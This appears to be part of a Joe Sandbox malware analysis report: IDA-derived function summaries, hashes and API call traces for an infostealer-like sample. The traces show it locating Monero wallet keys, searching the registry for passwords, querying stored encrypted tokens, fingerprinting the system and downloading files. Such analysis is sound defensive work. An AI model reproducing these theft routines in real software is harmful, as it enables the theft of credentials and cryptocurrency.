                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 0a349363cf4564b1adabc2775383797f40d968d855fc69e778396edf5a07b068
                            • Instruction ID: af3ca023e8845ce3af380a7297a5a129fd24f9e34e70fc4ae620bf89d6b9daa6
                            • Opcode Fuzzy Hash: 0a349363cf4564b1adabc2775383797f40d968d855fc69e778396edf5a07b068
                            • Instruction Fuzzy Hash: 467165B6900208ABCB58FBE4DC89FEE7779BB88300F048598F64597181EA75DB45CF91
                            APIs
                              • Part of subcall function 005F12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F12B4
                              • Part of subcall function 005F12A0: RtlAllocateHeap.NTDLL(00000000), ref: 005F12BB
                              • Part of subcall function 005F12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005F12D7
                              • Part of subcall function 005F12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005F12F5
                              • Part of subcall function 005F12A0: RegCloseKey.ADVAPI32(?), ref: 005F12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 005F134F
                            • lstrlen.KERNEL32(?), ref: 005F135C
                            • lstrcat.KERNEL32(?,.keys), ref: 005F1377
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 005F1465
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                              • Part of subcall function 005F99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                              • Part of subcall function 005F99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                              • Part of subcall function 005F99C0: ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                              • Part of subcall function 005F99C0: LocalFree.KERNEL32(005F148F), ref: 005F9A90
                              • Part of subcall function 005F99C0: CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 005F14EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 8c7cdbfd809d1f9d4b03f62a74d1a64af7e7f939173b8a5330de562458b10b11
                            • Instruction ID: 815c5d96aaca3641d0d2ee6bb7bc9e4cef24aa614c2390caa2fb0cdb98d9b83c
                            • Opcode Fuzzy Hash: 8c7cdbfd809d1f9d4b03f62a74d1a64af7e7f939173b8a5330de562458b10b11
                            • Instruction Fuzzy Hash: 925145B199021957CB59FB60DD96FEE733DAF54300F4045ACB60A620C1EE345B85CF99
                            APIs
                              • Part of subcall function 005F72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005F733A
                              • Part of subcall function 005F72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005F73B1
                              • Part of subcall function 005F72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005F740D
                              • Part of subcall function 005F72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 005F7452
                              • Part of subcall function 005F72D0: HeapFree.KERNEL32(00000000), ref: 005F7459
                            • lstrcat.KERNEL32(00000000,006117FC), ref: 005F7606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005F7648
                            • lstrcat.KERNEL32(00000000, : ), ref: 005F765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005F768F
                            • lstrcat.KERNEL32(00000000,00611804), ref: 005F76A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 005F76D3
                            • lstrcat.KERNEL32(00000000,00611808), ref: 005F76ED
                            • task.LIBCPMTD ref: 005F76FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 56e11a472ef9f857103d384961acf515fa9ef3cb699b21deee0eff0ca43467ce
                            • Instruction ID: 9edfc294f424477184dab46a67c3335889faba86e45a2dd033f95f421e7af064
                            • Opcode Fuzzy Hash: 56e11a472ef9f857103d384961acf515fa9ef3cb699b21deee0eff0ca43467ce
                            • Instruction Fuzzy Hash: 9E31407190110EDFCB48EBB4DC9ADFF7B79BB98301B144518F202A72A1DA39E946CB51
                            APIs
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                              • Part of subcall function 005F47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005F4839
                              • Part of subcall function 005F47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005F4849
                            • InternetOpenA.WININET(00610DF7,00000001,00000000,00000000,00000000), ref: 005F610F
                            • StrCmpCA.SHLWAPI(?,0140E430), ref: 005F6147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 005F618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 005F61B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 005F61DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005F620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 005F6249
                            • InternetCloseHandle.WININET(?), ref: 005F6253
                            • InternetCloseHandle.WININET(00000000), ref: 005F6260
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 360b408929b53ddea4c514fef5589f82133a11c326e85bba387d9d1558290bd1
                            • Instruction ID: 22f7582b40c5d0bb88c830e46ad3aab15ece90f034c50021ca030bd7e04be81e
                            • Opcode Fuzzy Hash: 360b408929b53ddea4c514fef5589f82133a11c326e85bba387d9d1558290bd1
                            • Instruction Fuzzy Hash: 47516DB1A4020CABDB24DFA0DC49BEE7BB9FB44701F108498A645A71C1DB786A85CF95
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 005F733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 005F73B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 005F740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 005F7452
                            • HeapFree.KERNEL32(00000000), ref: 005F7459
                            • task.LIBCPMTD ref: 005F7555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            • Opcode ID: 8885ea2b2e4b3da49fb0ec112830b6945ce729fa69bad93ff1d8c9cad258edb4
                            • Instruction ID: a83c4f3efa9ba1676a0d82b9466ab781ab48d76415609782a3b588b0910d0d68
                            • Opcode Fuzzy Hash: 8885ea2b2e4b3da49fb0ec112830b6945ce729fa69bad93ff1d8c9cad258edb4
                            • Instruction Fuzzy Hash: 10613CB590415D9BDB24DB50CC45FEABBB8BF48300F0085E9E689A6181DF745BC9CF90
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                            • lstrlen.KERNEL32(00000000), ref: 005FBC9F
                              • Part of subcall function 00608E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00608E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 005FBCCD
                            • lstrlen.KERNEL32(00000000), ref: 005FBDA5
                            • lstrlen.KERNEL32(00000000), ref: 005FBDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 9b6c40f6b6f6abc634ac2be5d21fd83252abd8394083035d022e1d926b72d3e7
                            • Instruction ID: 3ff4f86f99b6e6d09dc01411ed8cf5f072a6f603309a7d81ac25a8f8c6d09ff0
                            • Opcode Fuzzy Hash: 9b6c40f6b6f6abc634ac2be5d21fd83252abd8394083035d022e1d926b72d3e7
                            • Instruction Fuzzy Hash: 27B14C719502089BDB88EBE0CD96EEF733ABF54340F40456CF506A60D1EF346A49CBA6
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: the same 14 memory dumps as listed under the first Memory Dump Source entry above (005F0000 image)
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            • Opcode ID: 848fb2fac9eb9209b0aecf141d695ba695f80152009aafae3368f88c2f5f3c27
                            • Instruction ID: eb0f604c4bbadf939b582e1dceea921fb01f1e2a05d6c8701988b396840fce2e
                            • Opcode Fuzzy Hash: 848fb2fac9eb9209b0aecf141d695ba695f80152009aafae3368f88c2f5f3c27
                            • Instruction Fuzzy Hash: BBF0583098820DEFD348AFE0E949B6DBB70FB44703F040598F68986390EA704B519B96
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005F4FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F4FD1
                            • InternetOpenA.WININET(00610DDF,00000000,00000000,00000000,00000000), ref: 005F4FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 005F5011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 005F5041
                            • InternetCloseHandle.WININET(?), ref: 005F50B9
                            • InternetCloseHandle.WININET(?), ref: 005F50C6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: the same 14 memory dumps as listed under the first Memory Dump Source entry above (005F0000 image)
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            • Opcode ID: 2faf3933eaaaf4e00fc1101e77a93990d480231c9eabcce2cbbb9f397aaf9c1a
                            • Instruction ID: 8de311c277e8cc6680f2e5113f8e65968a882e3c853bde2d98b2cb6da19f2b03
                            • Opcode Fuzzy Hash: 2faf3933eaaaf4e00fc1101e77a93990d480231c9eabcce2cbbb9f397aaf9c1a
                            • Instruction Fuzzy Hash: 133108B4A4021CABDB24CF54DC89BDDB7B4FB48704F1085D8EB09A7281DB746AC58F99
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0140DAD0,00000000,?,00610E2C,00000000,?,00000000), ref: 00608130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00608137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00608158
                            • wsprintfA.USER32 ref: 006081AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: the same 14 memory dumps as listed under the first Memory Dump Source entry above (005F0000 image)
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2922868504-3474575989
                            • Opcode ID: 10467b20a0b2c33087e30529e7ed164e7ef85de750abd5bb5761eb1ace71e799
                            • Instruction ID: 3dc7a1d52430364ef75a221077ceba1e4c64e71edb192f0e0659d6a28901b2a4
                            • Opcode Fuzzy Hash: 10467b20a0b2c33087e30529e7ed164e7ef85de750abd5bb5761eb1ace71e799
                            • Instruction Fuzzy Hash: 9D2129B1A44208ABDB04DFD4DC49FAFBBB9FB44B10F104619F605BB2C0D77859018BA5
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00608426
                            • wsprintfA.USER32 ref: 00608459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0060847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0060848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00608499
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,0140D800,00000000,000F003F,?,00000400), ref: 006084EC
                            • lstrlen.KERNEL32(?), ref: 00608501
                            • RegQueryValueExA.ADVAPI32(00000000,0140D950,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00610B34), ref: 00608599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00608608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0060861A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: the same 14 memory dumps as listed under the first Memory Dump Source entry above (005F0000 image)
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            • Opcode ID: 69bb6c04da47586ac539bd00a22a1a2df19d376f837f64d135fa03b4df03a6a7
                            • Instruction ID: 5317406ae6352b1a0d4f67dd7e808374d4cd7548fb7e05abed18857819cffa97
                            • Opcode Fuzzy Hash: 69bb6c04da47586ac539bd00a22a1a2df19d376f837f64d135fa03b4df03a6a7
                            • Instruction Fuzzy Hash: 0F21E77195021CAFDB68DB54DC85FE9B3B9FB88700F00C598A649A6280DF71AA85CFD4
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006076A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006076AB
                            • RegOpenKeyExA.ADVAPI32(80000002,013FBC78,00000000,00020119,00000000), ref: 006076DD
                            • RegQueryValueExA.ADVAPI32(00000000,0140D908,00000000,00000000,?,000000FF), ref: 006076FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00607708
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: the same 14 memory dumps as listed under the first Memory Dump Source entry above (005F0000 image)
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            • Opcode ID: d093da2e47cea691d07b6d84c3dfc946049992b483c1a56ca6a97eada2b772eb
                            • Instruction ID: 0bb14f96b8b8b0be10205770137f0f01c4469ee83b6c18882e8f0108ff3352ca
                            • Opcode Fuzzy Hash: d093da2e47cea691d07b6d84c3dfc946049992b483c1a56ca6a97eada2b772eb
                            • Instruction Fuzzy Hash: 2F0162B5A44208BBEB08DBE4DC49FAEB7B9FB88701F104858FA45E72D0D671A9448B51
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00607734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0060773B
                            • RegOpenKeyExA.ADVAPI32(80000002,013FBC78,00000000,00020119,006076B9), ref: 0060775B
                            • RegQueryValueExA.ADVAPI32(006076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0060777A
                            • RegCloseKey.ADVAPI32(006076B9), ref: 00607784
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: the same 14 memory dumps as listed under the first Memory Dump Source entry above (005F0000 image)
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: 7beae9533d637f7e05a1b5f3afc29886a3f27b4268399a6163e6b9944ceb86a5
                            • Instruction ID: 86d78e08d9eddfef7f5f967f9678d61c3d31ff1eb0fc7eebfda353d1115d4ecd
                            • Opcode Fuzzy Hash: 7beae9533d637f7e05a1b5f3afc29886a3f27b4268399a6163e6b9944ceb86a5
                            • Instruction Fuzzy Hash: 860167B5A40308BFDB04DBE4DC49FAEB7B8FB84701F104558FA45A7281D67155408B51
                            APIs
                            • CreateFileA.KERNEL32(:`,80000000,00000003,00000000,00000003,00000080,00000000,?,00603AEE,?), ref: 006092FC
                            • GetFileSizeEx.KERNEL32(000000FF,:`), ref: 00609319
                            • CloseHandle.KERNEL32(000000FF), ref: 00609327
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: the same 14 memory dumps as listed under the first Memory Dump Source entry above (005F0000 image)
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :`$:`
                            • API String ID: 1378416451-1343392035
                            • Opcode ID: ad4cc6382fa00d942fcb8a4127746300fb01bc647cfc3789ec4b45abdb1a34c2
                            • Instruction ID: 9a146c213ffcff6b62673e82a323d263e6b1c401b02c7173ece62889a9680215
                            • Opcode Fuzzy Hash: ad4cc6382fa00d942fcb8a4127746300fb01bc647cfc3789ec4b45abdb1a34c2
                            • Instruction Fuzzy Hash: 9AF04F35E44208BBDB18DFB0DC49F9E77FABB88710F10C654B691A72C0D671A6018F50
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005F99EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 005F9A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 005F9A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,005F148F,00000000), ref: 005F9A5A
                            • LocalFree.KERNEL32(005F148F), ref: 005F9A90
                            • CloseHandle.KERNEL32(000000FF), ref: 005F9A9A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: the same 14 memory dumps as listed under the first Memory Dump Source entry above (005F0000 image)
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: a2ba0aba3c660365c03b215bd5797bddc74fe49047ae769578c8f17105d35b0d
                            • Instruction ID: 1e010214ef8eb2caf0869821197fb24de6b2cf05c49f1a540ffb17ec743d896b
                            • Opcode Fuzzy Hash: a2ba0aba3c660365c03b215bd5797bddc74fe49047ae769578c8f17105d35b0d
                            • Instruction Fuzzy Hash: B83109B4A0020DEFDB14CF94C985BAE7BB5FF88340F108558E951A7290D778AA41CFA1
                            APIs
